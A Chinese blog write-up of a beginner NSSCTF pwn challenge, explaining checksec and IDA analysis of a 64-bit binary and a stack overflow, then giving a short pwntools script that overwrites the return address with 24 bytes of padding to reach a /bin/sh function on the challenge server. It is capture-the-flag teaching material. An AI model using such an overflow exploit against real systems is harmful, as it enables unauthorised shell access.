标签：24 gift 16 然后 64 pwn payload NSSCTF

最近才开始接触”pwn“这个东西，这是近两天做的一个题目，然后就想着记一下。

好的，不如正题，

直接nc连接返回空白，然后直接退出，用kali的checksec工具或者是die检测一下附件，

 看到有NX，然后是一个64位的应用程序，拖入ida查看，shift+f12看相应的字符串

 看到了/bin/sh，

 接着追一下，然后f5查看伪代码，

存在溢出，并且是没有保护，然后编写exp

from pwn import *
p = remote('1.14.71.254',28048)
payload = b'a'*24+p64(0x4005B6)
p.sendline(payload)
p.interactive()

这里也可以去一下栈空间，因为是64位的应用程序，然后ret是8，加上溢出16，就是24，也可以是换一种写法b'a'*16+b'b'*8

 然后连接，成功进去，cat flag得到答案

标签：24,gift,16,然后,64,pwn,payload,NSSCTF
来源： https://www.cnblogs.com/darling024/p/15918384.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。